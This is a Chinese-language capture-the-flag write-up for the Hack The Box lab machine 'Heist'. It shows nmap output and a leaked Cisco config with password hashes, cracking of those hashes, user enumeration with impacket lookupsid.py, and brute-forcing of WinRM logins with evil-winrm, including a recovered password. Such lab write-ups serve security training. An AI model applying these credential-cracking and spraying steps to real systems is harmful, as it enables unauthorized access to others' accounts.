hackthebox-Heist

不同用户名可能对应相同的密码

nmap扫描，-p1-65535，得到端口80、135、445、5985、49668

80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
5985/tcp  open  wsman
49668/tcp open  unknown

查看http://10.10.10.149，在Login as guest中下载Attachment的config.txt

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0 mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

config.txt中提到Cisco的3个密码，2个为type7可直接解密，1个为type5使用hashcat解密；同时搜集到三个用户名rout3r、admin、Hazard，推测Hazard和type5的密码stealth1agent有关
使用impacket的lookupsid.py搜索其它用户名，发现support、Chase和Jason
1
./lookupsid.py Hazard:stealth1agent@10.10.10.149
使用evil-winrm，用上述发现的用户名和密码组成的字典进行爆破，获得Chase的密码
1
ruby evil-winrm.rb -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
获得user.txt